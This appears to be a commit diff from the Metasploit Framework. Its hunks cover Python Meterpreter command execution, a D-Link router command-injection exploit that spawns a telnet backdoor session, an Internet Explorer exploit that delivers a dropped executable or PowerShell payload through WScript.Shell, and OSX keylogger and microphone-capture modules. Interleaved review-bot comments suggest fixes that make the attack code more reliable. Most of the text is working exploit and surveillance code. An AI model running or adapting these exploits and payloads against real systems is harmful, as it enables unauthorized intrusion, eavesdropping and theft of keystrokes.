Update from master

bug/bundler_fix
Tab Assassin 2013-09-03 11:45:39 -05:00
commit 0c1e6546af
8 changed files with 760 additions and 784 deletions


@ -303,6 +303,7 @@ def channel_create_stdapi_fs_file(request, response):
fmode = packet_get_tlv(request, TLV_TYPE_FILE_MODE) fmode = packet_get_tlv(request, TLV_TYPE_FILE_MODE)
if fmode: if fmode:
fmode = fmode['value'] fmode = fmode['value']
fmode = fmode.replace('bb', 'b')
else: else:
fmode = 'rb' fmode = 'rb'
file_h = open(fpath, fmode) file_h = open(fpath, fmode)
@ -320,6 +321,7 @@ def channel_create_stdapi_net_tcp_client(request, response):
connected = False connected = False
for i in range(retries + 1): for i in range(retries + 1):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(3.0)
if local_host.get('value') and local_port.get('value'): if local_host.get('value') and local_port.get('value'):
sock.bind((local_host['value'], local_port['value'])) sock.bind((local_host['value'], local_port['value']))
try: try:
@ -380,7 +382,7 @@ def stdapi_sys_process_execute(request, response):
if len(cmd) == 0: if len(cmd) == 0:
return ERROR_FAILURE, response return ERROR_FAILURE, response
if os.path.isfile('/bin/sh'): if os.path.isfile('/bin/sh'):
args = ['/bin/sh', '-c', cmd, raw_args] args = ['/bin/sh', '-c', cmd + ' ' + raw_args]
else: else:
args = [cmd] args = [cmd]
args.extend(shlex.split(raw_args)) args.extend(shlex.split(raw_args))
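Review bot: In channel_create_stdapi_net_tcp_client the added `sock.settimeout(3.0)` is set on the socket object itself, so unless it is reset once the connect succeeds (the rest of the try block is outside the hunk) every later recv on that channel will raise socket.timeout after three seconds of inactivity. If the intent is only to bound the connect attempt, follow the successful connect with `sock.settimeout(None)` so the established channel goes back to blocking reads. A one-line comment such as `# bound the connect attempt; the channel is reset to blocking after connect` would make that intent explicit. Both this function and stdapi_sys_process_execute in the third hunk continue beyond the hunk.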


@ -404,5 +404,7 @@ class PythonMeterpreter(object):
return resp return resp
if not hasattr(os, 'fork') or (hasattr(os, 'fork') and os.fork() == 0): if not hasattr(os, 'fork') or (hasattr(os, 'fork') and os.fork() == 0):
if hasattr(os, 'setsid'):
os.setsid()
met = PythonMeterpreter(s) met = PythonMeterpreter(s)
met.run() met.run()
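Review bot: The condition on the line above the new block, `if not hasattr(os, 'fork') or (hasattr(os, 'fork') and os.fork() == 0):`, repeats the hasattr test; short-circuit evaluation already guarantees that the right operand only runs when `os.fork` exists, so `if not hasattr(os, 'fork') or os.fork() == 0:` reads the same. The added `os.setsid()` runs only in the forked child, where the call is not refused for already leading a process group, so no guard is needed, but a short comment such as `# child: start a new session so it is detached from the parent's terminal` would document why it is there. The enclosing code starts outside the hunk.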


@ -11,7 +11,6 @@ class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::CommandShell
def initialize(info = {}) def initialize(info = {})
super(update_info(info, super(update_info(info,
@ -20,10 +19,7 @@ class Metasploit3 < Msf::Exploit::Remote
Different D-Link Routers are vulnerable to OS command injection via the web Different D-Link Routers are vulnerable to OS command injection via the web
interface. The vulnerability exists in command.php, which is accessible without interface. The vulnerability exists in command.php, which is accessible without
authentication. This module has been tested with the versions DIR-600 2.14b01, authentication. This module has been tested with the versions DIR-600 2.14b01,
DIR-300 rev B 2.13. Two target are included, the first one starts a telnetd service DIR-300 rev B 2.13.
and establish a session over it, the second one runs commands via the CMD target.
There is no wget or tftp client to upload an elf backdoor easily. According to the
vulnerability discoverer, more D-Link devices may affected.
}, },
'Author' => 'Author' =>
[ [
@ -42,61 +38,45 @@ class Metasploit3 < Msf::Exploit::Remote
], ],
'DisclosureDate' => 'Feb 04 2013', 'DisclosureDate' => 'Feb 04 2013',
'Privileged' => true, 'Privileged' => true,
'Platform' => ['linux','unix'], 'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Payload' => 'Payload' =>
{ {
'DisableNops' => true, 'Compat' => {
'PayloadType' => 'cmd_interact',
'ConnectionType' => 'find',
}, },
},
'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' },
'Targets' => 'Targets' =>
[ [
[ 'CMD', #all devices [ 'Automatic', { } ]
{
'Arch' => ARCH_CMD,
'Platform' => 'unix'
}
], ],
[ 'Telnet', #all devices - default target 'DefaultTarget' => 0
{
'Arch' => ARCH_CMD,
'Platform' => 'unix'
}
],
],
'DefaultTarget' => 1
)) ))
register_advanced_options(
[
OptInt.new('TelnetTimeout', [ true, 'The number of seconds to wait for a reply from a Telnet command', 10]),
OptInt.new('TelnetBannerTimeout', [ true, 'The number of seconds to wait for the initial banner', 25]),
OptInt.new('SessionTimeout', [ true, 'The number of seconds to wait before building the session on the telnet connection', 10])
], self.class)
end
def tel_timeout
(datastore['TelnetTimeout'] || 10).to_i
end
def banner_timeout
(datastore['TelnetBannerTimeout'] || 25).to_i
end
def session_timeout
(datastore['SessionTimeout'] || 10).to_i
end end
def exploit def exploit
if target.name =~ /CMD/
exploit_cmd
else
exploit_telnet
end
end
def exploit_cmd
if not (datastore['CMD'])
fail_with(Failure::BadConfig, "#{rhost}:#{rport} - Only the cmd/generic payload is compatible")
end
cmd = "#{payload.encoded}; echo end"
print_status("#{rhost}:#{rport} - Sending exploit request...")
res = request(cmd)
if (!res or res.code != 200 or res.headers['Server'].nil? or res.headers['Server'] !~ /Linux, HTTP\/1.1, DIR/)
fail_with(Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload")
end
if res.body.include?("end")
print_good("#{rhost}:#{rport} - Exploited successfully\n")
vprint_line("#{rhost}:#{rport} - Command: #{datastore['CMD']}\n")
vprint_line("#{rhost}:#{rport} - Output: #{res.body}")
else
fail_with(Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload")
end
return
end
def exploit_telnet
telnetport = rand(65535) telnetport = rand(65535)
print_status("#{rhost}:#{rport} - Telnet port used: #{telnetport}") print_status("#{rhost}:#{rport} - Telnet port used: #{telnetport}")
@ -107,39 +87,33 @@ class Metasploit3 < Msf::Exploit::Remote
print_status("#{rhost}:#{rport} - Sending exploit request...") print_status("#{rhost}:#{rport} - Sending exploit request...")
request(cmd) request(cmd)
begin print_status("#{rhost}:#{rport} - Trying to establish a telnet connection...")
sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => telnetport.to_i }) sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => telnetport.to_i })
if sock if sock.nil?
print_good("#{rhost}:#{rport} - Backdoor service has been spawned, handling...") fail_with(Exploit::Failure::Unreachable, "#{rhost}:#{rport} - Backdoor service has not been spawned!!!")
add_socket(sock)
else
fail_with(Failure::Unknown, "#{rhost}:#{rport} - Backdoor service has not been spawned!!!")
end end
print_status "Attempting to start a Telnet session #{rhost}:#{telnetport}" print_status("#{rhost}:#{rport} - Trying to establish a telnet session...")
auth_info = { prompt = negotiate_telnet(sock)
:host => rhost, if prompt.nil?
:port => telnetport, sock.close
:sname => 'telnet', fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to establish a telnet session")
:user => "", else
:pass => "", print_good("#{rhost}:#{rport} - Telnet session successfully established... trying to connect")
:source_type => "exploit", end
:active => true
} print_status("#{rhost}:#{rport} - Trying to create the Msf session...")
report_auth_info(auth_info) begin
merge_me = { Timeout.timeout(session_timeout) do
'USERPASS_FILE' => nil, activated = handler(sock)
'USER_FILE' => nil, while(activated !~ /claimed/)
'PASS_FILE' => nil, activated = handler(sock)
'USERNAME' => nil, end
'PASSWORD' => nil end
} rescue ::Timeout::Error
start_session(self, "TELNET (#{rhost}:#{telnetport})", merge_me, false, sock) fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to establish a Msf session")
rescue
fail_with(Failure::Unknown, "#{rhost}:#{rport} - Could not handle the backdoor service")
end end
return
end end
def request(cmd) def request(cmd)
@ -156,7 +130,24 @@ class Metasploit3 < Msf::Exploit::Remote
}) })
return res return res
rescue ::Rex::ConnectionError rescue ::Rex::ConnectionError
fail_with(Failure::Unknown, "#{rhost}:#{rport} - Could not connect to the webservice") fail_with(Exploit::Failure::Unreachable, "#{rhost}:#{rport} - Could not connect to the webservice")
end end
end end
def negotiate_telnet(sock)
begin
Timeout.timeout(banner_timeout) do
while(true)
data = sock.get_once(-1, tel_timeout)
return nil if not data or data.length == 0
if data =~ /\x23\x20$/
return true
end
end
end
rescue ::Timeout::Error
return nil
end
end
end end
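Review bot: In `exploit`, the session-wait loop `while(activated !~ /claimed/) activated = handler(sock) end` calls `handler(sock)` back to back until `session_timeout` elapses, and when `::Timeout::Error` is rescued the socket is left open, whereas the `prompt.nil?` branch a few lines earlier calls `sock.close` before `fail_with`; adding `sock.close` inside that rescue keeps the two failure paths consistent, and if `handler` returns immediately when nothing is claimed (not visible here) a brief `sleep` in the loop would avoid spinning. In `negotiate_telnet`, `return nil if not data or data.length == 0` reads more idiomatically as `return nil if data.nil? || data.empty?`, and `while(true)` as `loop do`. `exploit` begins in the `@ -42,61 +38,45` hunk and its body continues into the next one, so the method spans two hunks; `negotiate_telnet` is fully visible.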


@ -6,12 +6,15 @@
## ##
require 'msf/core' require 'msf/core'
require 'msf/util/exe'
require 'msf/core/exploit/powershell'
class Metasploit3 < Msf::Exploit::Remote class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpServer::HTML include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::EXE include Msf::Exploit::EXE
include Msf::Exploit::Powershell
def initialize(info = {}) def initialize(info = {})
super(update_info(info, super(update_info(info,
@ -21,10 +24,7 @@ class Metasploit3 < Msf::Exploit::Remote
marked safe for scripting" setting within Internet Explorer. When this option is set, marked safe for scripting" setting within Internet Explorer. When this option is set,
IE allows access to the WScript.Shell ActiveX control, which allows javascript to IE allows access to the WScript.Shell ActiveX control, which allows javascript to
interact with the file system and run commands. This security flaw is not uncommon interact with the file system and run commands. This security flaw is not uncommon
in corporate environments for the 'Intranet' or 'Trusted Site' zones. In order to in corporate environments for the 'Intranet' or 'Trusted Site' zones.
save binary data to the file system, ADODB.Stream access is required, which in IE7
will trigger a cross domain access violation. As such, we write the code to a .vbs
file and execute it from there, where no such restrictions exist.
When set via domain policy, the most common registry entry to modify is HKLM\ When set via domain policy, the most common registry entry to modify is HKLM\
Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\1201, Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\1201,
@ -35,96 +35,73 @@ class Metasploit3 < Msf::Exploit::Remote
via a direct GET http://msf-server/ or as a javascript include, such as in: via a direct GET http://msf-server/ or as a javascript include, such as in:
http://intranet-server/xss.asp?id="><script%20src=http://10.10.10.10/ie_unsafe_script.js> http://intranet-server/xss.asp?id="><script%20src=http://10.10.10.10/ie_unsafe_script.js>
</script>. </script>.
IE Tabs, WScript and subsequent Powershell prompts all run as x86 even when run from
an x64 iexplore.exe.
}, },
'License' => MSF_LICENSE, 'License' => MSF_LICENSE,
'Author' => 'Author' =>
[ [
'natron' 'natron',
'Ben Campbell <eat_meatballs[at]hotmail.co.uk>' # PSH and remove ADODB.Stream
], ],
'References' => 'References' =>
[ [
[ 'URL', 'http://support.microsoft.com/kb/182569' ], [ 'URL', 'http://support.microsoft.com/kb/182569' ],
[ 'URL', 'http://blog.invisibledenizen.org/2009/01/ieunsafescripting-metasploit-module.html' ], [ 'URL', 'http://blog.invisibledenizen.org/2009/01/ieunsafescripting-metasploit-module.html' ],
[ 'URL', 'http://support.microsoft.com/kb/870669']
], ],
'DisclosureDate' => 'Sep 20 2010', 'DisclosureDate' => 'Sep 20 2010',
'Payload' =>
{
'Space' => 2048,
'StackAdjustment' => -3500,
},
'Platform' => 'win', 'Platform' => 'win',
'Targets' => 'Targets' =>
[ [
[ 'Automatic', { } ], [ 'Windows x86/x64', { 'Arch' => ARCH_X86 } ]
], ],
'DefaultOptions' => 'DefaultOptions' =>
{ {
'HTTP::compression' => 'gzip' 'HTTP::compression' => 'gzip'
}, },
'DefaultTarget' => 0)) 'DefaultTarget' => 0))
register_options(
[
OptEnum.new('TECHNIQUE', [true, 'Delivery technique (VBS Exe Drop or PSH CMD)', 'VBS', ['VBS','Powershell']]),
], self.class
)
end end
def on_request_uri(cli, request) def on_request_uri(cli, request)
#print_status("Starting...");
# Build out the HTML response page # Build out the HTML response page
var_shellobj = rand_text_alpha(rand(5)+5); var_shellobj = rand_text_alpha(rand(5)+5)
var_fsobj = rand_text_alpha(rand(5)+5);
var_fsobj_file = rand_text_alpha(rand(5)+5);
var_vbsname = rand_text_alpha(rand(5)+5);
var_writedir = rand_text_alpha(rand(5)+5);
var_exename = rand_text_alpha(rand(5)+5);
var_origLoc = rand_text_alpha(rand(5)+5);
var_byteArray = rand_text_alpha(rand(5)+5);
var_stream = rand_text_alpha(rand(5)+5);
var_writestream = rand_text_alpha(rand(5)+5);
var_strmConv = rand_text_alpha(rand(5)+5);
p = regenerate_payload(cli); p = regenerate_payload(cli)
print_status("Request received for #{request.uri}"); if datastore['TECHNIQUE'] == 'VBS'
exe = generate_payload_exe({ :code => p.encoded }) js_content = vbs_technique(var_shellobj, p)
#print_status("Building vbs file..."); else
# Build the content that will end up in the .vbs file js_content = psh_technique(var_shellobj, p)
vbs_content = Rex::Text.to_hex(%Q|Dim #{var_origLoc}, s, #{var_byteArray}
#{var_origLoc} = SetLocale(1033)
|)
print_status("Encoding payload into vbs/javascript/html...");
# Drop the exe payload into an ansi string (ansi ensured via SetLocale above)
# for conversion with ADODB.Stream
vbs_ary = []
# The output of this loop needs to be as small as possible since it
# gets repeated for every byte of the executable, ballooning it by a
# factor of about 80k (the current size of the exe template). In its
# current form, it's down to about 4MB on the wire
exe.each_byte do |b|
vbs_ary << Rex::Text.to_hex("s=s&Chr(#{("%d" % b)})\n")
end end
vbs_content << vbs_ary.join("")
# Continue with the rest of the vbs file; print_status("Request received for #{request.uri}")
# Use ADODB.Stream to convert from an ansi string to it's byteArray equivalent print_status("Sending exploit html/javascript");
# Then use ADODB.Stream again to write the binary to file.
#print_status("Finishing vbs...");
vbs_content << Rex::Text.to_hex(%Q|
Dim #{var_strmConv}, #{var_writedir}, #{var_writestream}
#{var_writedir} = WScript.CreateObject("WScript.Shell").ExpandEnvironmentStrings("%TEMP%") & "\\#{var_exename}.exe"
Set #{var_strmConv} = CreateObject("ADODB.Stream") # Transmit the response to the client
send_response(cli, js_content, { 'Content-Type' => 'text/html' })
#{var_strmConv}.Type = 2 # Handle the payload
#{var_strmConv}.Charset = "x-ansi" handler(cli)
#{var_strmConv}.Open end
#{var_strmConv}.WriteText s, 0
#{var_strmConv}.Position = 0
#{var_strmConv}.Type = 1
#{var_strmConv}.SaveToFile #{var_writedir}, 2
SetLocale(#{var_origLoc})|) def vbs_technique(var_shellobj, p)
var_fsobj = rand_text_alpha(rand(5)+5)
var_fsobj_file = rand_text_alpha(rand(5)+5)
var_vbsname = rand_text_alpha(rand(5)+5)
var_writedir = rand_text_alpha(rand(5)+5)
# Encode the vbs_content exe = generate_payload_exe({ :code => p.encoded })
#print_status("Hex encoded vbs_content: #{vbs_content}"); vbs = Msf::Util::EXE.to_exe_vbs(exe)
vbs_content = Rex::Text.to_hex(vbs)
# Build the javascript that will be served # Build the javascript that will be served
js_content = %Q| js_content = %Q|
@ -138,18 +115,21 @@ var #{var_fsobj_file} = #{var_fsobj}.OpenTextFile(#{var_writedir} + "\\\\" + "#{
#{var_fsobj_file}.Close(); #{var_fsobj_file}.Close();
#{var_shellobj}.run("wscript.exe " + #{var_writedir} + "\\\\" + "#{var_vbsname}.vbs", 1, true); #{var_shellobj}.run("wscript.exe " + #{var_writedir} + "\\\\" + "#{var_vbsname}.vbs", 1, true);
#{var_shellobj}.run(#{var_writedir} + "\\\\" + "#{var_exename}.exe", 0, false);
#{var_fsobj}.DeleteFile(#{var_writedir} + "\\\\" + "#{var_vbsname}.vbs"); #{var_fsobj}.DeleteFile(#{var_writedir} + "\\\\" + "#{var_vbsname}.vbs");
//</script></html> //</script></html>
| |
return js_content
end
print_status("Sending exploit html/javascript"); def psh_technique(var_shellobj, p)
print_status("Exe will be #{var_exename}.exe and must be manually removed from the %TEMP% directory on the target."); cmd = Rex::Text.to_hex(cmd_psh_payload(p.encoded))
js_content = %Q|
//<html><head></head><body><script>
var #{var_shellobj} = new ActiveXObject("WScript.Shell");
#{var_shellobj}.run(unescape("#{cmd}"), 1, true);
//</script></html>
|
# Transmit the response to the client return js_content
send_response(cli, js_content, { 'Content-Type' => 'text/html' })
# Handle the payload
handler(cli)
end end
end end
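Review bot: `vbs_technique` and `psh_technique` both end with an explicit `return js_content` although `js_content` is already the last expression of each method, and `print_status("Sending exploit html/javascript");` in `on_request_uri` keeps a trailing semicolon while the commit strips the semicolons from the surrounding lines; dropping both makes the new code match the rest of the file. The removed status line `Exe will be #{var_exename}.exe and must be manually removed from the %TEMP% directory on the target.` told the operator that the VBS path leaves an executable on disk; if `Msf::Util::EXE.to_exe_vbs` does not remove what it writes (not visible here), an equivalent notice is worth keeping in `vbs_technique`. `on_request_uri` and `psh_technique` each lie within one hunk, while `vbs_technique` starts in the `@ -35,96 +35,73` hunk and ends in the following one.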


@ -19,7 +19,7 @@ class Metasploit3 < Msf::Exploit::Remote
'Name' => 'Firefox XMLSerializer Use After Free', 'Name' => 'Firefox XMLSerializer Use After Free',
'Description' => %q{ 'Description' => %q{
This module exploits a vulnerability found on Firefox 17.0 (< 17.0.2), specifically This module exploits a vulnerability found on Firefox 17.0 (< 17.0.2), specifically
an use after free of an Element object, when using the serializeToStream method a use-after-free of an Element object, when using the serializeToStream method
with a specially crafted OutputStream defining its own write function. This module with a specially crafted OutputStream defining its own write function. This module
has been tested successfully with Firefox 17.0.1 ESR, 17.0.1 and 17.0 on Windows XP has been tested successfully with Firefox 17.0.1 ESR, 17.0.1 and 17.0 on Windows XP
SP3. SP3.


@ -62,6 +62,7 @@ class Metasploit3 < Msf::Exploit::Local
}, },
'References' => 'References' =>
[ [
[ 'CVE', '2013-3956' ],
[ 'OSVDB', '93718' ], [ 'OSVDB', '93718' ],
[ 'URL', 'http://www.novell.com/support/kb/doc.php?id=7012497' ], [ 'URL', 'http://www.novell.com/support/kb/doc.php?id=7012497' ],
[ 'URL', 'http://pastebin.com/GB4iiEwR' ] [ 'URL', 'http://pastebin.com/GB4iiEwR' ]


@ -29,12 +29,12 @@ class Metasploit3 < Msf::Post
super(update_info(info, super(update_info(info,
'Name' => 'OSX Capture Userspace Keylogger', 'Name' => 'OSX Capture Userspace Keylogger',
'Description' => %q{ 'Description' => %q{
Logs all keyboard events except cmd-keys and GUI password input. This module logs all keyboard events except cmd-keys and GUI password input.
Keylogs are transferred between client/server in chunks Keylogs are transferred between client/server in chunks
every SYNCWAIT seconds for reliability. every SYNCWAIT seconds for reliability.
Works by calling the Carbon GetKeys() hook using the DL lib It works by calling the Carbon GetKeys() hook using the DL lib
in OSX's system Ruby. The Ruby code is executed in a shell in OSX's system Ruby. The Ruby code is executed in a shell
command using -e, so the payload never hits the disk. command using -e, so the payload never hits the disk.
}, },
@ -113,7 +113,7 @@ class Metasploit3 < Msf::Post
"keylog", "text/plain", session, log, "keylog.log", "OSX keylog" "keylog", "text/plain", session, log, "keylog.log", "OSX keylog"
) )
else else
File.open(self.loot_path, 'a') { |f| f.write(log) } File.open(self.loot_path, 'ab') { |f| f.write(log) }
end end
print_status(log_a.map{ |a| a=~/([^\s]+)\s*$/; $1 }.join) print_status(log_a.map{ |a| a=~/([^\s]+)\s*$/; $1 }.join)
print_status "Saved to #{self.loot_path}" print_status "Saved to #{self.loot_path}"


@ -21,7 +21,7 @@ class Metasploit3 < Msf::Post
super(update_info(info, super(update_info(info,
'Name' => 'OSX Manage Record Microphone', 'Name' => 'OSX Manage Record Microphone',
'Description' => %q{ 'Description' => %q{
This module will allow you to detect (with the LIST action) and This module will allow the user to detect (with the LIST action) and
capture (with the RECORD action) audio inputs on a remote OSX machine. capture (with the RECORD action) audio inputs on a remote OSX machine.
}, },
'License' => MSF_LICENSE, 'License' => MSF_LICENSE,